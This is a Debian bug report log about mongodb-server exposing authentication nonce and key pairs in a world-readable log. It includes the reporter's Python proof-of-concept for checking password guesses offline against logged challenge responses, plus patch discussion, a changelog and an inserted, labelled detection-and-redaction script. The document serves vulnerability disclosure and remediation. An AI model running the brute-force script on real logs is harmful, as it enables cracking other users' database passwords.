bruteforcable challenge responses in unprotected logfile

Related Vulnerabilities: CVE-2016-6494  

Debian Bug report logs - #833087


Reported by: kpcyrd <kpcyrd@rxv.cc>

Date: Sun, 31 Jul 2016 17:57:01 UTC

Severity: grave

Tags: fixed-upstream, security, upstream

Found in versions mongodb/1:2.4.10-5, 2.0.6-1

Fixed in versions 2.0.6-1+deb7u1, mongodb/1:2.6.11-1, mongodb/1:2.4.10-5+deb8u1

Done: Apollon Oikonomopoulos <apoikos@debian.org>

Bug is archived. No further changes may be made.

Forwarded to https://jira.mongodb.org/browse/SERVER-9476



Report forwarded to debian-bugs-dist@lists.debian.org, Laszlo Boszormenyi (GCS) <gcs@debian.org>:
Bug#833087; Package mongodb-server. (Sun, 31 Jul 2016 17:57:05 GMT)


Acknowledgement sent to kpcyrd <kpcyrd@rxv.cc>:
New Bug report received and forwarded. Copy sent to Laszlo Boszormenyi (GCS) <gcs@debian.org>. (Sun, 31 Jul 2016 17:57:05 GMT)


Message #5 received at submit@bugs.debian.org:

From: kpcyrd <kpcyrd@rxv.cc>
To: submit@bugs.debian.org
Subject: bruteforcable challenge responses in unprotected logfile
Date: Sun, 31 Jul 2016 17:54:25 +0000
Package: mongodb-server
Version: 2.4.10-5
Severity: grave
Tags: security

There's a bugfix[1] from 2013 for an issue that wasn't announced for
security that's currently not included in debian stable.

[1]: https://jira.mongodb.org/browse/SERVER-9476

Current mongodb in stable logs authentication attempts like this:

	Sat Jul 30 21:57:08.657 [initandlisten] connection accepted from 127.0.0.1:62883 #9 (1 connection now open)
	Sat Jul 30 21:57:16.677 [conn9]  authenticate db: test { authenticate: 1, nonce: "7222f1306039344e", user: "foo", key: "84bed68ebbe64358e836186f95315328" }
	Sat Jul 30 21:57:16.677 [conn9] auth: couldn't find user foo@test, test.system.users
	Sat Jul 30 21:57:18.385 [conn9] end connection 127.0.0.1:62883 (0 connections now open)

The logfile is world readable for all local users on a default
installation. The above snippet maps to a login attempt as foo:bar.

key= is the resulting md5 hash of a function that takes nonce=, user=
and password as parameters.

Below is a script that's able to take the parameters from the logfile
and verify if a given password was used for authentication, making it
suitable for offline bruteforce. (results may vary depending on password
quality, of course)

```python
#!/usr/bin/env python3
'''
Login attempt with foo:bar

Sat Jul 30 21:57:08.657 [initandlisten] connection accepted from 127.0.0.1:62883 #9 (1 connection now open)
Sat Jul 30 21:57:16.677 [conn9]  authenticate db: test { authenticate: 1, nonce: "7222f1306039344e", user: "foo", key: "84bed68ebbe64358e836186f95315328" }
Sat Jul 30 21:57:16.677 [conn9] auth: couldn't find user foo@test, test.system.users
Sat Jul 30 21:57:18.385 [conn9] end connection 127.0.0.1:62883 (0 connections now open)

$ ./mongobrute.py 7222f1306039344e foo 84bed68ebbe64358e836186f95315328 bar
[+] Password matches challenge key: b'bar'
$
'''
from hashlib import md5
import sys


def createPasswordDigest(username, clearTextPassword):
    # MONGODB-CR password digest: hex md5 of "<user>:mongo:<password>"
    return md5(username + b':mongo:' + clearTextPassword).hexdigest()


def recalculateChallenge(nonce, user, password):
    # The key= value in the log is md5("<nonce><user><password digest>"),
    # so with nonce and user from the log a password guess can be checked offline.
    digested = createPasswordDigest(user, password)
    digested_bytes = bytes(digested, 'utf-8')
    return md5(nonce + user + digested_bytes).hexdigest()


if __name__ == '__main__':
    try:
        nonce = bytes(sys.argv[1], 'utf-8')
        user = bytes(sys.argv[2], 'utf-8')
        key = sys.argv[3]
        password = bytes(sys.argv[4], 'utf-8')
    except IndexError:
        print('Usage: %s <nonce> <user> <key> <password-to-verify>' % sys.argv[0], file=sys.stderr)
        sys.exit(2)

    challenge = recalculateChallenge(nonce, user, password)

    if challenge == key:
        print('[+] Password matches challenge key: %r' % password)
    else:
        print('[-] Password does not match challenge key: %r' % password)
        sys.exit(1)
```

This is a slightly modified version of the mail I sent to security@ for
responsible disclosure and got the go-ahead to post it on the public
bugtracker.

This got fixed with f85ceb1 by upstream (released in 2.5.4), stretch
isn't affected.

Thanks.




Added tag(s) upstream and fixed-upstream. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Mon, 01 Aug 2016 05:15:10 GMT)


Set Bug forwarded-to-address to 'https://jira.mongodb.org/browse/SERVER-9476'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Mon, 01 Aug 2016 05:15:11 GMT)


No longer marked as found in versions 2.4.10-5. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Mon, 01 Aug 2016 05:15:12 GMT)


Marked as found in versions mongodb/1:2.4.10-5. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Mon, 01 Aug 2016 05:15:12 GMT)


Marked as fixed in versions mongodb/1:2.6.11-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Mon, 01 Aug 2016 05:15:13 GMT)


Information forwarded to debian-bugs-dist@lists.debian.org, Laszlo Boszormenyi (GCS) <gcs@debian.org>:
Bug#833087; Package mongodb-server. (Wed, 03 Aug 2016 21:33:09 GMT)


Acknowledgement sent to Ola Lundqvist <ola@inguza.com>:
Extra info received and forwarded to list. Copy sent to Laszlo Boszormenyi (GCS) <gcs@debian.org>. (Wed, 03 Aug 2016 21:33:09 GMT)


Message #20 received at 833087@bugs.debian.org:

From: Ola Lundqvist <ola@inguza.com>
To: Jérémy Lal <kapouer@melix.org>, "Laszlo Boszormenyi (GCS)" <gcs@debian.org>, Debian LTS <debian-lts@lists.debian.org>, 833087@bugs.debian.org, 832908@bugs.debian.org
Subject: Security update of mongodb
Date: Wed, 3 Aug 2016 23:32:02 +0200
Hi Jérémy, Laszlo and LTS team

You have probably seen my latest emails about "Bug#832908: mongodb:
CVE-2016-6494: world-readable .dbshell history file: LTS update and upgrade
handling".

I have now prepared a security update of this CVE-2016-6494 and in addition
to that TEMP-0833087-C5410D.

For https://security-tracker.debian.org/tracker/CVE-2016-6494 you can find
the patch in bug 832908.

For https://security-tracker.debian.org/tracker/TEMP-0833087-C5410D I could
not easily backport the fix for sid as the code was considerably different.
So I made a simpler solution. The upstream fix was to mangle only the
sensitive data. In wheezy I replaced the whole sensitive string with XXX.
This means that the logging is not that good anymore but this should not
impact any application functionality. I do not think most people will
notice this anyway so I think it is safe.

Upstream fix looks something like this in the logs:
Tue Aug  2 11:41:13 [conn4]  authenticate: { authenticate: 1.0, user:
"foo", nonce: "XXXX", key: "XXXX" }

My fix looks like this:
Wed Aug  3 21:18:52 [conn1]  authenticate: XXXX

I made the short-cut as I do not think it is worth the effort to do a full
back-port.

You can find the debdiff here:
http://apt.inguza.net/wheezy-security/mongodb/mongodb.debdiff

And the prepared package here:
http://apt.inguza.net/wheezy-security/mongodb/

Regarding testing I have done a simple regression test by installing the
new packages, checking that the database is there and that I can access the
server.

I have also been able to reproduce both issues and been able to verify that
both fixes do really solve the problem.

If I do not hear any objections I will upload the corrected packages in
four (4) days, that is on Sunday (maybe on Monday after).

Best regards

// Ola

-- 
 --- Inguza Technology AB --- MSc in Information Technology ----
/  ola@inguza.com                    Folkebogatan 26            \
|  opal@debian.org                   654 68 KARLSTAD            |
|  http://inguza.com/                Mobile: +46 (0)70-332 1551 |
\  gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9  /
 ---------------------------------------------------------------
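The two messages above describe the same log line from opposite sides: kpcyrd's report shows the 2.4-era `authenticate` line leaking `nonce` and `key` to every local user who can read the log, and Ola's message describes the upstream fix as replacing those two values with `XXXX` (the wheezy backport blanks the whole string). The following script, added here as an example and not code from the bug report, from Debian or from MongoDB, is a defender-side check for that exposure: it scans mongod log lines for still-unredacted challenge/response pairs, shows what the upstream-style redaction would look like, and reports whether the log file's permissions match the world-readable default the report mentions. The sample log is constructed from the lines quoted in the thread; the function names and the regexes are assumptions of this example.

```python
#!/usr/bin/env python3
"""Find and redact MONGODB-CR challenge/response pairs in mongod logs.

Added example for Debian bug #833087 (not code from the bug report, from
Debian or from MongoDB). The log format is the one quoted in the report;
the redaction reproduces what the thread describes as the upstream fix
(nonce and key replaced with "XXXX"). Function names and the sample lines
below are assumptions/constructed for this example.
"""
import os
import re
import stat
import sys

# A 2.4-era auth log line carries the challenge (nonce) and the response (key)
# in clear; anyone who can read the log can check password guesses offline.
NONCE_RE = re.compile(r'(nonce:\s*")([0-9a-fA-F]+)(")')
KEY_RE = re.compile(r'(key:\s*")([0-9a-fA-F]{32})(")')
USER_RE = re.compile(r'user:\s*"([^"]*)"')

# Constructed sample: line 2 is the report's vulnerable line, line 4 the
# upstream-style redacted line, line 5 the wheezy-style redacted line.
SAMPLE_LOG = """\
Sat Jul 30 21:57:08.657 [initandlisten] connection accepted from 127.0.0.1:62883 #9 (1 connection now open)
Sat Jul 30 21:57:16.677 [conn9]  authenticate db: test { authenticate: 1, nonce: "7222f1306039344e", user: "foo", key: "84bed68ebbe64358e836186f95315328" }
Sat Jul 30 21:57:16.677 [conn9] auth: couldn't find user foo@test, test.system.users
Tue Aug  2 11:41:13 [conn4]  authenticate: { authenticate: 1.0, user: "foo", nonce: "XXXX", key: "XXXX" }
Wed Aug  3 21:18:52 [conn1]  authenticate: XXXX
"""


def find_exposed(lines):
    """Return (line_no, user, nonce, key) for each line that still leaks a usable pair.

    A line counts as exposed only when both a hex nonce and a 32-hex-digit key
    are present; redacted lines ("XXXX") do not match the hex patterns.
    """
    hits = []
    for no, line in enumerate(lines, start=1):
        if 'authenticate' not in line:
            continue
        nonce = NONCE_RE.search(line)
        key = KEY_RE.search(line)
        if nonce and key:
            user = USER_RE.search(line)
            hits.append((no, user.group(1) if user else '', nonce.group(2), key.group(2)))
    return hits


def redact(line):
    """Replace the nonce and key values with XXXX, mirroring the upstream fix."""
    line = NONCE_RE.sub(r'\1XXXX\3', line)
    return KEY_RE.sub(r'\1XXXX\3', line)


def world_readable_from_mode(mode):
    """True if the 'other' read bit is set (e.g. 0o644), which is what lets
    unprivileged local users read the log in the default installation."""
    return bool(mode & stat.S_IROTH)


def log_is_world_readable(path):
    return world_readable_from_mode(os.stat(path).st_mode)


if __name__ == '__main__':
    if len(sys.argv) > 1:
        path = sys.argv[1]
        with open(path, encoding='utf-8', errors='replace') as fh:
            lines = fh.read().splitlines()
        if log_is_world_readable(path):
            print('[!] %s is world readable' % path)
    else:
        lines = SAMPLE_LOG.splitlines()
    for no, user, nonce, key in find_exposed(lines):
        print('[!] line %d: user %r nonce %s key %s' % (no, user, nonce, key))
        print('    redacted: %s' % redact(lines[no - 1]))
```

Run it with a log path (`./check_mongo_log.py /var/log/mongodb/mongodb.log`) to audit an existing log; with no argument it runs over the constructed sample and flags only the unredacted line. Rotated logs written before the package was upgraded still contain the pairs, so redaction (or deletion) of old files is part of the cleanup, not just the upgrade.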

Marked as found in versions 2.0.6-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Mon, 08 Aug 2016 13:57:11 GMT)


Marked as fixed in versions 2.0.6-1+deb7u1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Mon, 08 Aug 2016 13:57:12 GMT)


Added tag(s) pending. Request was from Apollon Oikonomopoulos <apoikos@debian.org> to control@bugs.debian.org. (Sat, 28 Jan 2017 19:45:08 GMT)


Reply sent to Apollon Oikonomopoulos <apoikos@debian.org>:
You have taken responsibility. (Sun, 12 Feb 2017 22:51:09 GMT)


Notification sent to kpcyrd <kpcyrd@rxv.cc>:
Bug acknowledged by developer. (Sun, 12 Feb 2017 22:51:10 GMT)


Message #31 received at 833087-close@bugs.debian.org:

From: Apollon Oikonomopoulos <apoikos@debian.org>
To: 833087-close@bugs.debian.org
Subject: Bug#833087: fixed in mongodb 1:2.4.10-5+deb8u1
Date: Sun, 12 Feb 2017 22:47:09 +0000
Source: mongodb
Source-Version: 1:2.4.10-5+deb8u1

We believe that the bug you reported is fixed in the latest version of
mongodb, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 833087@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Apollon Oikonomopoulos <apoikos@debian.org> (supplier of updated mongodb package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Wed, 11 Jan 2017 11:17:56 +0200
Source: mongodb
Binary: mongodb mongodb-server mongodb-clients mongodb-dev
Architecture: source
Version: 1:2.4.10-5+deb8u1
Distribution: jessie
Urgency: medium
Maintainer: Laszlo Boszormenyi (GCS) <gcs@debian.org>
Changed-By: Apollon Oikonomopoulos <apoikos@debian.org>
Description:
 mongodb    - object/document-oriented database (metapackage)
 mongodb-clients - object/document-oriented database (client apps)
 mongodb-dev - object/document-oriented database (development)
 mongodb-server - object/document-oriented database (server package)
Closes: 832908 833087
Changes:
 mongodb (1:2.4.10-5+deb8u1) jessie; urgency=medium
 .
   * Redact key and nonce from auth attempt logs (Closes: #833087)
   * Backport patch for CVE-2016-6494 from 2.6 (Closes: #832908)
Checksums-Sha1:
 6ed2b5928e8ed601c25fc19b3efee6dc77d9437a 2811 mongodb_2.4.10-5+deb8u1.dsc
 0105e9282795ed9d780ae5efb6586c9108f0180b 57220 mongodb_2.4.10-5+deb8u1.debian.tar.xz
Checksums-Sha256:
 7c5b1ec310c3167e8cb2f29b62ac625dc1f5432d0ecbe42d92d08aa496cf4a92 2811 mongodb_2.4.10-5+deb8u1.dsc
 9db03eb4de977a690e679edac9a5c0810c11fd15865b3faa203fea3c6cd12b21 57220 mongodb_2.4.10-5+deb8u1.debian.tar.xz
Files:
 f8ee704885bbc85b0ac04d76123c9d43 2811 database optional mongodb_2.4.10-5+deb8u1.dsc
 60bf0e4460a40674ecfd605f2f407381 57220 database optional mongodb_2.4.10-5+deb8u1.debian.tar.xz

-----BEGIN PGP SIGNATURE-----

iQJHBAEBCAAxFiEEPgL9ZlYpWVIRC6uZ9RsYxyAkgiQFAliOgIMTHGFwb2lrb3NA
ZGViaWFuLm9yZwAKCRD1GxjHICSCJFYFD/wJsjZgINOyyHkQstXNQfhtL0yLeG0s
xNAwwP1wAuU/UFkxI77F5yWzHV257Gt5ow/VqaYELkQtftjjjwZMG6LSCcE+Vzk/
yPKGZW2kvPk/K9wrrQiyRmgNc7+IZNdgtC0L68HiH4rZGGhh/E4b1OGgxubmxuBN
Af/aFm3/Yz/kPSkrFmxPm703zYvDrJMcnZA5fCA0WWHnTzA06icqDU6CNt/GM+nB
FjnVzqmewT0NFIFQtBdpPCrJOklYvu9qym2x5zo3rkX8CxVMIIJkFrAbFpVVxMDf
OHJrWtH76sstrgh72FETXnlwM4zbh0liHPgfeN+VuIewvOX8xlNZQvtrCrGLO+UH
4kP4Gaj2NaTcofdPE6cbHsV5HT26y/GwcSmRijyvViemsXrUSEcy8jcLwYwUu3YP
XWCxUNjkRBUwZ2OsqWznZGgKg3wr6WzjuGGYAF2o1GnwyjwGp+EYsfvAFLZZ2Eup
a/IebuSFIUVYbcPz9Z3keV/gIr9zaDCk5LdzXqnjtgfuGPnhIuP6dAblTSyue4q2
ZjiGiE1vAnP50Q0ZLkLSSEwxGLIowjm9j5IoX36JPwooZZ74rCDNH1rfaSYAgaMh
SgyVI71LB60nvgP6UKW3OLtOKnCridEcluCGxzwnLkUedHhBSoGzopLCS/H4TPhS
K1R5m7Nus8AR4A==
=Fa3Z
-----END PGP SIGNATURE-----




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 19 Nov 2017 07:29:04 GMT)




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 13:32:39 2019; Machine Name: buxtehude
